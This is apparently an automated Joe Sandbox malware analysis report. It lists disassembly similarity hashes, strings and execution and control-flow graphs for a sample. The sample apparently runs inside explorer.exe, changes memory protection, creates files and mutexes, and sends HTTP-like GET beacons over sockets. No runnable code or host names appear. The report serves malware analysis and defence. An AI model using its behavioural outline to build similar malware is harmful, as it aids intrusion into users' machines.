                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                      • Opcode ID: 98079a6e19fe46204cdef73c44b04f949d3cbab5d361e3744d68f5b881aa5ca8
                                                                                                                      • Instruction ID: eb2e6c8c592a11db77a7f737da97e2297df9a4ef3e28c9e1ce4db5bdd2c77f58
                                                                                                                      • Opcode Fuzzy Hash: 98079a6e19fe46204cdef73c44b04f949d3cbab5d361e3744d68f5b881aa5ca8
                                                                                                                      • Instruction Fuzzy Hash: 1F21657AE00159ABDB15DF79DC40AEEBBF8FF54654F040126E945D7340E730DA028BA1
                                                                                                                      Strings
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011302E7
                                                                                                                      • RTL: Re-Waiting, xrefs: 0113031E
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011302BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      • Opcode ID: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                                                                                      • Instruction ID: 18a044f6b6f308b364f7cb3337da8736f8bb5a887f2a1e87bebc9e57c3e002c6
                                                                                                                      • Opcode Fuzzy Hash: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                                                                                      • Instruction Fuzzy Hash: 98E190706087429FE729CF29C888B2ABBE0BF88714F144A5DF5A58B2E1D774D945CB42
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 01137BAC
                                                                                                                      • RTL: Resource at %p, xrefs: 01137B8E
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01137B7F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      • Opcode ID: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                                                                                      • Instruction ID: 9004b9c06e85b2910b020b3a57ca4499e4b68828d51e58053dc660a52c80193c
                                                                                                                      • Opcode Fuzzy Hash: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                                                                                      • Instruction Fuzzy Hash: FF41D3357047029FD729DE29CC41B6AB7E5EF98710F100A1DEA9A9BA80DB71E4058F91
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113728C
                                                                                                                      Strings
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01137294
                                                                                                                      • RTL: Re-Waiting, xrefs: 011372C1
                                                                                                                      • RTL: Resource at %p, xrefs: 011372A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
• Instruction ID: 76a9ff83bb737cb3d79a00de6cd3847aa750f2b22ef56ec07f8586dde39063bc
• Opcode Fuzzy Hash: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
• Instruction Fuzzy Hash: 4E410271700203ABD729DE29CC42F6AB7A5FF94714F10061DFA95AB680DB31F8428BD1
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
• Instruction ID: dff2f91dd3d7c75f27f877311d446bbc30eaa769310df555791f991065951048
• Opcode Fuzzy Hash: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
• Instruction Fuzzy Hash: 83317572A002199FDB24DF2DDC40BEEB7F8EF58614F54455AE949E7240EB30AA458BA0
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
• Instruction ID: 5f450c6c40fd46670a887fced3e3fc4d694720ccd108c48e57e4f820ce4c57a1
• Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
• Instruction Fuzzy Hash: F791C570E002169BDF2EDF6DC8806BEBBA5BF44320F14451EE9A5A72C4D7B0AD408B52
Strings
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
• Instruction ID: fd367e354c0f1ce59b8e389373f3948d16b3c581cf0c5527d2a68e180d89bac1
• Opcode Fuzzy Hash: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
• Instruction Fuzzy Hash: 06811C72D002699BDB35CB54CC45BEEBBB8AB48754F0041EAEA59B7240D7705E85CFA0

Execution Graph

Execution Coverage: 2.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.7%
Total number of Nodes: 444
Total number of Limit Nodes: 15
                                                                                                                      execution_graph 13508 e910e12 13512 e90f942 13508->13512 13510 e910e45 NtProtectVirtualMemory 13511 e910e70 13510->13511 13513 e90f967 13512->13513 13513->13510 13834 e905613 13836 e905620 13834->13836 13835 e905684 13836->13835 13837 e910e12 NtProtectVirtualMemory 13836->13837 13837->13836 13762 e909cd4 13764 e909cd8 13762->13764 13763 e90a022 13764->13763 13768 e909352 13764->13768 13766 e909f0d 13766->13763 13777 e909792 13766->13777 13769 e90939e 13768->13769 13770 e9094ec 13769->13770 13772 e909595 13769->13772 13776 e90958e 13769->13776 13771 e90f232 NtCreateFile 13770->13771 13774 e9094ff 13771->13774 13773 e90f232 NtCreateFile 13772->13773 13772->13776 13773->13776 13775 e90f232 NtCreateFile 13774->13775 13774->13776 13775->13776 13776->13766 13778 e9097e0 13777->13778 13779 e90f232 NtCreateFile 13778->13779 13781 e90990c 13779->13781 13780 e909af3 13780->13766 13781->13780 13782 e909352 NtCreateFile 13781->13782 13783 e909602 NtCreateFile 13781->13783 13782->13781 13783->13781 13914 e907dd9 13915 e907df0 13914->13915 13916 e90b382 ObtainUserAgentString 13915->13916 13917 e907ecd 13915->13917 13916->13917 13514 e9042dd 13515 e90431a 13514->13515 13516 e9043fa 13515->13516 13517 e904328 SleepEx 13515->13517 13521 e90ef12 13515->13521 13530 e905432 13515->13530 13540 e9040f2 13515->13540 13517->13515 13517->13517 13522 e90ef48 13521->13522 13525 e90f0e9 13522->13525 13527 e90f232 NtCreateFile 13522->13527 13529 e90f134 13522->13529 13546 e90ff82 13522->13546 13524 e90f125 13566 e90e922 13524->13566 13525->13524 13558 e90e842 13525->13558 13527->13522 13529->13515 13531 e90545b 13530->13531 13538 e9054c9 13530->13538 13532 e90f232 NtCreateFile 13531->13532 13531->13538 13533 e905496 13532->13533 13539 e9054c5 13533->13539 13578 e905082 13533->13578 13534 e90f232 NtCreateFile 13534->13538 13536 e9054b6 13536->13539 13587 e904f52 13536->13587 
13538->13515 13539->13534 13539->13538 13541 e904109 13540->13541 13543 e9041d3 13540->13543 13592 e904012 13541->13592 13543->13515 13544 e904113 13544->13543 13545 e90ff82 6 API calls 13544->13545 13545->13543 13547 e90ffb8 13546->13547 13548 e90c5b2 socket 13547->13548 13549 e910081 13547->13549 13557 e910022 13547->13557 13548->13549 13550 e910134 13549->13550 13552 e910117 getaddrinfo 13549->13552 13549->13557 13551 e90c732 connect 13550->13551 13553 e9101b2 13550->13553 13550->13557 13551->13553 13552->13550 13554 e90c6b2 send 13553->13554 13553->13557 13556 e910729 13554->13556 13555 e9107f4 setsockopt recv 13555->13557 13556->13555 13556->13557 13557->13522 13559 e90e86d 13558->13559 13574 e90f232 13559->13574 13561 e90e906 13561->13525 13562 e90e888 13562->13561 13563 e90e8c5 13562->13563 13564 e90ff82 6 API calls 13562->13564 13563->13561 13565 e90f232 NtCreateFile 13563->13565 13564->13563 13565->13561 13567 e90e9c2 13566->13567 13568 e90f232 NtCreateFile 13567->13568 13569 e90e9d6 13568->13569 13570 e90ea9f 13569->13570 13572 e90ff82 6 API calls 13569->13572 13573 e90ea5d 13569->13573 13570->13529 13571 e90f232 NtCreateFile 13571->13570 13572->13573 13573->13570 13573->13571 13575 e90f25c 13574->13575 13577 e90f334 13574->13577 13576 e90f410 NtCreateFile 13575->13576 13575->13577 13576->13577 13577->13562 13579 e905420 13578->13579 13580 e9050aa 13578->13580 13579->13536 13580->13579 13581 e90f232 NtCreateFile 13580->13581 13583 e9051f9 13581->13583 13582 e9053df 13582->13536 13583->13582 13584 e90f232 NtCreateFile 13583->13584 13585 e9053c9 13584->13585 13586 e90f232 NtCreateFile 13585->13586 13586->13582 13588 e904f70 13587->13588 13589 e904f84 13587->13589 13588->13539 13590 e90f232 NtCreateFile 13589->13590 13591 e905046 13590->13591 13591->13539 13594 e904031 13592->13594 13593 e9040cd 13593->13544 13594->13593 13595 e90ff82 6 API calls 13594->13595 13595->13593 13784 e907edd 13786 e907f06 13784->13786 13785 e907fa4 13786->13785 13787 e9048f2 
NtProtectVirtualMemory 13786->13787 13788 e907f9c 13787->13788 13789 e90b382 ObtainUserAgentString 13788->13789 13789->13785 13838 e911a1f 13839 e911a25 13838->13839 13842 e9055f2 13839->13842 13841 e911a3d 13843 e9055fb 13842->13843 13844 e90560e 13842->13844 13843->13844 13846 e90a662 13843->13846 13844->13841 13847 e90a66b 13846->13847 13855 e90a7ba 13846->13855 13848 e9040f2 6 API calls 13847->13848 13847->13855 13850 e90a6ee 13848->13850 13849 e90a750 13852 e90a83f 13849->13852 13854 e90a791 13849->13854 13849->13855 13850->13849 13851 e90ff82 6 API calls 13850->13851 13851->13849 13853 e90ff82 6 API calls 13852->13853 13852->13855 13853->13855 13854->13855 13856 e90ff82 6 API calls 13854->13856 13855->13844 13856->13855 13487 e90ff82 13488 e90ffb8 13487->13488 13490 e910081 13488->13490 13498 e910022 13488->13498 13499 e90c5b2 13488->13499 13491 e910134 13490->13491 13493 e910117 getaddrinfo 13490->13493 13490->13498 13494 e9101b2 13491->13494 13491->13498 13502 e90c732 13491->13502 13493->13491 13494->13498 13505 e90c6b2 13494->13505 13496 e9107f4 setsockopt recv 13496->13498 13497 e910729 13497->13496 13497->13498 13500 e90c60a socket 13499->13500 13501 e90c5ec 13499->13501 13500->13490 13501->13500 13503 e90c788 connect 13502->13503 13504 e90c76a 13502->13504 13503->13494 13504->13503 13506 e90c705 send 13505->13506 13507 e90c6e7 13505->13507 13506->13497 13507->13506 13937 e90914a 13938 e909153 13937->13938 13943 e909174 13937->13943 13940 e90b382 ObtainUserAgentString 13938->13940 13939 e9091e7 13941 e90916c 13940->13941 13942 e9040f2 6 API calls 13941->13942 13942->13943 13943->13939 13945 e9041f2 13943->13945 13946 e90420f 13945->13946 13949 e9042c9 13945->13949 13947 e90ef12 7 API calls 13946->13947 13950 e904242 13946->13950 13947->13950 13948 e904289 13948->13949 13951 e9040f2 6 API calls 13948->13951 13949->13943 13950->13948 13952 e905432 NtCreateFile 13950->13952 13951->13949 13952->13948 13857 e910e0a 13858 e910e45 NtProtectVirtualMemory 
13857->13858 13859 e90f942 13857->13859 13860 e910e70 13858->13860 13859->13858 13881 e911a4d 13882 e911a53 13881->13882 13885 e905782 13882->13885 13884 e911a6b 13886 e90578f 13885->13886 13887 e9057ad 13886->13887 13888 e90a662 6 API calls 13886->13888 13887->13884 13888->13887 13918 e9119f1 13919 e9119f7 13918->13919 13922 e906852 13919->13922 13921 e911a0f 13923 e9068e4 13922->13923 13924 e906865 13922->13924 13923->13921 13924->13923 13926 e906887 13924->13926 13928 e90687e 13924->13928 13925 e90c36f 13925->13921 13926->13923 13927 e90a662 6 API calls 13926->13927 13927->13923 13928->13925 13929 e90c0c2 6 API calls 13928->13929 13929->13925 13790 e9040f1 13791 e904109 13790->13791 13792 e9041d3 13790->13792 13793 e904012 6 API calls 13791->13793 13794 e904113 13793->13794 13794->13792 13795 e90ff82 6 API calls 13794->13795 13795->13792 13930 e9055f1 13931 e905606 13930->13931 13932 e90560e 13930->13932 13933 e90a662 6 API calls 13931->13933 13933->13932 13483 e90f232 13484 e90f25c 13483->13484 13486 e90f334 13483->13486 13485 e90f410 NtCreateFile 13484->13485 13484->13486 13485->13486 13889 e9119b3 13890 e9119bd 13889->13890 13893 e9066d2 13890->13893 13892 e9119e0 13894 e906704 13893->13894 13895 e9066f7 13893->13895 13897 e90672d 13894->13897 13899 e906737 13894->13899 13901 e9066ff 13894->13901 13896 e9040f2 6 API calls 13895->13896 13896->13901 13902 e90c2c2 13897->13902 13900 e90ff82 6 API calls 13899->13900 13899->13901 13900->13901 13901->13892 13903 e90c2df 13902->13903 13904 e90c2cb 13902->13904 13903->13901 13904->13903 13905 e90c0c2 6 API calls 13904->13905 13905->13903 13796 e9082f4 13798 e908349 13796->13798 13797 e90849f 13799 e9048f2 NtProtectVirtualMemory 13797->13799 13803 e9084c3 13797->13803 13798->13797 13800 e9048f2 NtProtectVirtualMemory 13798->13800 13799->13803 13801 e908480 13800->13801 13802 e9048f2 NtProtectVirtualMemory 13801->13802 13802->13797 13804 e9048f2 NtProtectVirtualMemory 13803->13804 13805 e908597 13803->13805 
13804->13805 13806 e9048f2 NtProtectVirtualMemory 13805->13806 13807 e9085bf 13805->13807 13806->13807 13811 e9048f2 NtProtectVirtualMemory 13807->13811 13812 e9086b9 13807->13812 13808 e9086e1 13809 e90b382 ObtainUserAgentString 13808->13809 13810 e9086e9 13809->13810 13811->13812 13812->13808 13813 e9048f2 NtProtectVirtualMemory 13812->13813 13813->13808 13742 e90c0b9 13743 e90c1f0 13742->13743 13744 e90c0ed 13742->13744 13744->13743 13745 e90ff82 6 API calls 13744->13745 13745->13743 13861 e90e83a 13862 e90e841 13861->13862 13863 e90ff82 6 API calls 13862->13863 13865 e90e8c5 13863->13865 13864 e90e906 13865->13864 13866 e90f232 NtCreateFile 13865->13866 13866->13864 13953 e90ff7a 13955 e90ffb8 13953->13955 13954 e910022 13955->13954 13956 e90c5b2 socket 13955->13956 13957 e910081 13955->13957 13956->13957 13957->13954 13958 e910134 13957->13958 13960 e910117 getaddrinfo 13957->13960 13958->13954 13959 e90c732 connect 13958->13959 13962 e9101b2 13958->13962 13959->13962 13960->13958 13961 e90c6b2 send 13963 e910729 13961->13963 13962->13954 13962->13961 13963->13954 13964 e9107f4 setsockopt recv 13963->13964 13964->13954 13814 e9080fb 13816 e908137 13814->13816 13815 e9082d5 13816->13815 13817 e9048f2 NtProtectVirtualMemory 13816->13817 13818 e90828a 13817->13818 13819 e9048f2 NtProtectVirtualMemory 13818->13819 13822 e9082a9 13819->13822 13820 e9082cd 13821 e90b382 ObtainUserAgentString 13820->13821 13821->13815 13822->13820 13823 e9048f2 NtProtectVirtualMemory 13822->13823 13823->13820 13746 e90a8be 13747 e90a8c3 13746->13747 13748 e90a9a6 13747->13748 13749 e90a995 ObtainUserAgentString 13747->13749 13749->13748 13906 e907fbf 13908 e908016 13906->13908 13907 e9080f0 13908->13907 13911 e9048f2 NtProtectVirtualMemory 13908->13911 13912 e9080bb 13908->13912 13909 e9080e8 13910 e90b382 ObtainUserAgentString 13909->13910 13910->13907 13911->13912 13912->13909 13913 e9048f2 NtProtectVirtualMemory 13912->13913 13913->13909 13824 e909ce2 13825 e909dd9 13824->13825 
13826 e90a022 13825->13826 13827 e909352 NtCreateFile 13825->13827 13828 e909f0d 13827->13828 13828->13826 13829 e909792 NtCreateFile 13828->13829 13829->13828 13830 e90c2e4 13831 e90c36f 13830->13831 13832 e90c305 13830->13832 13832->13831 13833 e90c0c2 6 API calls 13832->13833 13833->13831 13969 e906b66 13971 e906b6a 13969->13971 13970 e906cce 13971->13970 13972 e906cb5 CreateMutexExW 13971->13972 13972->13970 13750 e911aa9 13751 e911aaf 13750->13751 13754 e90c212 13751->13754 13753 e911ac7 13755 e90c237 13754->13755 13756 e90c21b 13754->13756 13755->13753 13756->13755 13758 e90c0c2 13756->13758 13759 e90c0cb 13758->13759 13761 e90c1f0 13758->13761 13760 e90ff82 6 API calls 13759->13760 13759->13761 13760->13761 13761->13755 13867 e90b22a 13868 e90b25e 13867->13868 13869 e90a8c2 ObtainUserAgentString 13868->13869 13870 e90b26b 13869->13870 13596 e910bac 13597 e910bb1 13596->13597 13630 e910bb6 13597->13630 13631 e906b72 13597->13631 13599 e910c2c 13600 e910c85 13599->13600 13602 e910c54 13599->13602 13603 e910c69 13599->13603 13599->13630 13601 e90eab2 NtProtectVirtualMemory 13600->13601 13606 e910c8d 13601->13606 13607 e90eab2 NtProtectVirtualMemory 13602->13607 13604 e910c80 13603->13604 13605 e910c6e 13603->13605 13604->13600 13609 e910c97 13604->13609 13608 e90eab2 NtProtectVirtualMemory 13605->13608 13667 e908102 13606->13667 13611 e910c5c 13607->13611 13612 e910c76 13608->13612 13613 e910c9c 13609->13613 13614 e910cbe 13609->13614 13653 e907ee2 13611->13653 13659 e907fc2 13612->13659 13635 e90eab2 13613->13635 13617 e910cc7 13614->13617 13618 e910cd9 13614->13618 13614->13630 13620 e90eab2 NtProtectVirtualMemory 13617->13620 13623 e90eab2 NtProtectVirtualMemory 13618->13623 13618->13630 13622 e910ccf 13620->13622 13677 e9082f2 13622->13677 13624 e910ce5 13623->13624 13695 e908712 13624->13695 13633 e906b93 13631->13633 13632 e906cce 13632->13599 13633->13632 13634 e906cb5 CreateMutexExW 13633->13634 13634->13632 13637 e90eadf 13635->13637 13636 e90eebc 
13645 e907de2 13636->13645 13637->13636 13707 e9048f2 13637->13707 13639 e90ee5c 13640 e9048f2 NtProtectVirtualMemory 13639->13640 13641 e90ee7c 13640->13641 13642 e9048f2 NtProtectVirtualMemory 13641->13642 13643 e90ee9c 13642->13643 13644 e9048f2 NtProtectVirtualMemory 13643->13644 13644->13636 13646 e907df0 13645->13646 13648 e907ecd 13646->13648 13730 e90b382 13646->13730 13649 e904412 13648->13649 13651 e904440 13649->13651 13650 e904473 13650->13630 13651->13650 13652 e90444d CreateThread 13651->13652 13652->13630 13655 e907f06 13653->13655 13654 e907fa4 13654->13630 13655->13654 13656 e9048f2 NtProtectVirtualMemory 13655->13656 13657 e907f9c 13656->13657 13658 e90b382 ObtainUserAgentString 13657->13658 13658->13654 13661 e908016 13659->13661 13660 e9080f0 13660->13630 13661->13660 13664 e9048f2 NtProtectVirtualMemory 13661->13664 13665 e9080bb 13661->13665 13662 e9080e8 13663 e90b382 ObtainUserAgentString 13662->13663 13663->13660 13664->13665 13665->13662 13666 e9048f2 NtProtectVirtualMemory 13665->13666 13666->13662 13669 e908137 13667->13669 13668 e9082d5 13668->13630 13669->13668 13670 e9048f2 NtProtectVirtualMemory 13669->13670 13671 e90828a 13670->13671 13672 e9048f2 NtProtectVirtualMemory 13671->13672 13675 e9082a9 13672->13675 13673 e9082cd 13674 e90b382 ObtainUserAgentString 13673->13674 13674->13668 13675->13673 13676 e9048f2 NtProtectVirtualMemory 13675->13676 13676->13673 13680 e908349 13677->13680 13678 e90849f 13679 e9048f2 NtProtectVirtualMemory 13678->13679 13684 e9084c3 13678->13684 13679->13684 13680->13678 13681 e9048f2 NtProtectVirtualMemory 13680->13681 13682 e908480 13681->13682 13683 e9048f2 NtProtectVirtualMemory 13682->13683 13683->13678 13685 e9048f2 NtProtectVirtualMemory 13684->13685 13686 e908597 13684->13686 13685->13686 13687 e9048f2 NtProtectVirtualMemory 13686->13687 13688 e9085bf 13686->13688 13687->13688 13689 e9086b9 13688->13689 13693 e9048f2 NtProtectVirtualMemory 13688->13693 13690 e9086e1 13689->13690 13694 e9048f2 
NtProtectVirtualMemory 13689->13694 13691 e90b382 ObtainUserAgentString 13690->13691 13692 e9086e9 13691->13692 13692->13630 13693->13689 13694->13690 13696 e908767 13695->13696 13697 e908903 13696->13697 13698 e9048f2 NtProtectVirtualMemory 13696->13698 13703 e908992 13697->13703 13705 e9048f2 NtProtectVirtualMemory 13697->13705 13699 e9088e3 13698->13699 13700 e9048f2 NtProtectVirtualMemory 13699->13700 13700->13697 13701 e9089b7 13702 e90b382 ObtainUserAgentString 13701->13702 13704 e9089bf 13702->13704 13703->13701 13706 e9048f2 NtProtectVirtualMemory 13703->13706 13704->13630 13705->13703 13706->13701 13708 e904987 13707->13708 13713 e9049b2 13708->13713 13722 e905622 13708->13722 13710 e904c0c 13710->13639 13711 e904ba2 13712 e910e12 NtProtectVirtualMemory 13711->13712 13721 e904b5b 13712->13721 13713->13710 13713->13711 13714 e904ac5 13713->13714 13726 e910e12 13714->13726 13716 e910e12 NtProtectVirtualMemory 13716->13710 13717 e904ae3 13717->13710 13718 e904b3d 13717->13718 13719 e910e12 NtProtectVirtualMemory 13717->13719 13720 e910e12 NtProtectVirtualMemory 13718->13720 13719->13718 13720->13721 13721->13710 13721->13716 13724 e90567a 13722->13724 13723 e905684 13723->13713 13724->13723 13725 e910e12 NtProtectVirtualMemory 13724->13725 13725->13724 13727 e90f942 13726->13727 13728 e910e45 NtProtectVirtualMemory 13727->13728 13729 e910e70 13728->13729 13729->13717 13731 e90b3c7 13730->13731 13734 e90b232 13731->13734 13733 e90b438 13733->13648 13735 e90b25e 13734->13735 13738 e90a8c2 13735->13738 13737 e90b26b 13737->13733 13739 e90a934 13738->13739 13740 e90a9a6 13739->13740 13741 e90a995 ObtainUserAgentString 13739->13741 13740->13737 13741->13740 13871 e90542e 13872 e90545b 13871->13872 13880 e9054c9 13871->13880 13873 e90f232 NtCreateFile 13872->13873 13872->13880 13874 e905496 13873->13874 13875 e9054c5 13874->13875 13877 e905082 NtCreateFile 13874->13877 13876 e90f232 NtCreateFile 13875->13876 13875->13880 13876->13880 13878 e9054b6 13877->13878 
13878->13875 13879 e904f52 NtCreateFile 13878->13879 13879->13875 13934 e90c72e 13935 e90c788 connect 13934->13935 13936 e90c76a 13934->13936 13936->13935

Control-flow Graph

• Executed
• Not Executed
                                                                                                                      control_flow_graph 0 e90ff82-e90ffb6 1 e90ffd6-e90ffd9 0->1 2 e90ffb8-e90ffbc 0->2 4 e9108fe-e91090c 1->4 5 e90ffdf-e90ffed 1->5 2->1 3 e90ffbe-e90ffc2 2->3 3->1 6 e90ffc4-e90ffc8 3->6 7 e90fff3-e90fff7 5->7 8 e9108f6-e9108f7 5->8 6->1 11 e90ffca-e90ffce 6->11 9 e90fff9-e90fffd 7->9 10 e90ffff-e910000 7->10 8->4 9->10 12 e91000a-e910010 9->12 10->12 11->1 13 e90ffd0-e90ffd4 11->13 14 e910012-e910020 12->14 15 e91003a-e910060 12->15 13->1 13->5 14->15 16 e910022-e910026 14->16 17 e910062-e910066 15->17 18 e910068-e91007c call e90c5b2 15->18 16->8 19 e91002c-e910035 16->19 17->18 20 e9100a8-e9100ab 17->20 22 e910081-e9100a2 18->22 19->8 23 e9100b1-e9100b8 20->23 24 e910144-e910150 20->24 22->20 26 e9108ee-e9108ef 22->26 27 e9100e2-e9100f5 23->27 28 e9100ba-e9100dc call e90f942 23->28 25 e910156-e910165 24->25 24->26 30 e910167-e910178 call e90c552 25->30 31 e91017f-e91018f 25->31 26->8 27->26 29 e9100fb-e910101 27->29 28->27 29->26 33 e910107-e910109 29->33 30->31 35 e910191-e9101ad call e90c732 31->35 36 e9101e5-e91021b 31->36 33->26 40 e91010f-e910111 33->40 47 e9101b2-e9101da 35->47 38 e91022d-e910231 36->38 39 e91021d-e91022b 36->39 44 e910233-e910245 38->44 45 e910247-e91024b 38->45 43 e91027f-e910280 39->43 40->26 46 e910117-e910132 getaddrinfo 40->46 51 e910283-e9102e0 call e910d62 call e90d482 call e90ce72 call e911002 43->51 44->43 48 e910261-e910265 45->48 49 e91024d-e91025f 45->49 46->24 50 e910134-e91013c 46->50 47->36 52 e9101dc-e9101e1 47->52 53 e910267-e91026b 48->53 54 e91026d-e910279 48->54 49->43 50->24 63 e9102e2-e9102e6 51->63 64 e9102f4-e910354 call e910d92 51->64 52->36 53->51 53->54 54->43 63->64 65 e9102e8-e9102ef call e90d042 63->65 69 e91035a-e910396 call e910d62 call e911262 call e911002 64->69 70 e91048c-e9104b8 call e910d62 call e911262 64->70 65->64 84 e910398-e9103b7 call e911262 call e911002 69->84 85 e9103bb-e9103e9 
call e911262 * 2 69->85 79 e9104d9-e910590 call e911262 * 3 call e911002 * 2 call e90d482 70->79 80 e9104ba-e9104d5 70->80 109 e910595-e9105b9 call e911262 79->109 80->79 84->85 101 e910415-e91041d 85->101 102 e9103eb-e910410 call e911002 call e911262 85->102 105 e910442-e910448 101->105 106 e91041f-e910425 101->106 102->101 105->109 110 e91044e-e910456 105->110 107 e910467-e910487 call e911262 106->107 108 e910427-e91043d 106->108 107->109 108->109 120 e9105d1-e9106ad call e911262 * 7 call e911002 call e910d62 call e911002 call e90ce72 call e90d042 109->120 121 e9105bb-e9105cc call e911262 call e911002 109->121 110->109 113 e91045c-e91045d 110->113 113->107 132 e9106af-e9106b3 120->132 121->132 135 e9106b5-e9106fa call e90c382 call e90c7b2 132->135 136 e9106ff-e91072d call e90c6b2 132->136 153 e9108e6-e9108e7 135->153 144 e91075d-e910761 136->144 145 e91072f-e910735 136->145 149 e910767-e91076b 144->149 150 e91090d-e910913 144->150 145->144 148 e910737-e91074c 145->148 148->144 154 e91074e-e910754 148->154 157 e910771-e910773 149->157 158 e9108aa-e9108df call e90c7b2 149->158 155 e910779-e910784 150->155 156 e910919-e910920 150->156 153->26 154->144 163 e910756 154->163 159 e910795-e910796 155->159 160 e910786-e910793 155->160 156->160 157->155 157->158 158->153 164 e91079c-e9107a0 159->164 160->159 160->164 163->144 167 e9107b1-e9107b2 164->167 168 e9107a2-e9107af 164->168 170 e9107b8-e9107c4 167->170 168->167 168->170 173 e9107f4-e910861 setsockopt recv 170->173 174 e9107c6-e9107ef call e910d92 call e910d62 170->174 177 e9108a3-e9108a4 173->177 178 e910863 173->178 174->173 177->158 178->177 181 e910865-e91086a 178->181 181->177 184 e91086c-e910872 181->184 184->177 186 e910874-e9108a1 184->186 186->177 186->178
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
Similarity
• API ID: getaddrinforecvsetsockopt
• String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
• API String ID: 1564272048-1117930895
• Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction ID: 81bcfce9f3f3e765d0c3276b27eb8fb67a47812ee30415e520f6a15f394f7c05
• Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction Fuzzy Hash: 09525E30618B0C8FDB69EB68C4947E9B7E1FB94300F504A6ED49FC7186DE71A985CB81

Control-flow Graph

• Executed
• Not Executed
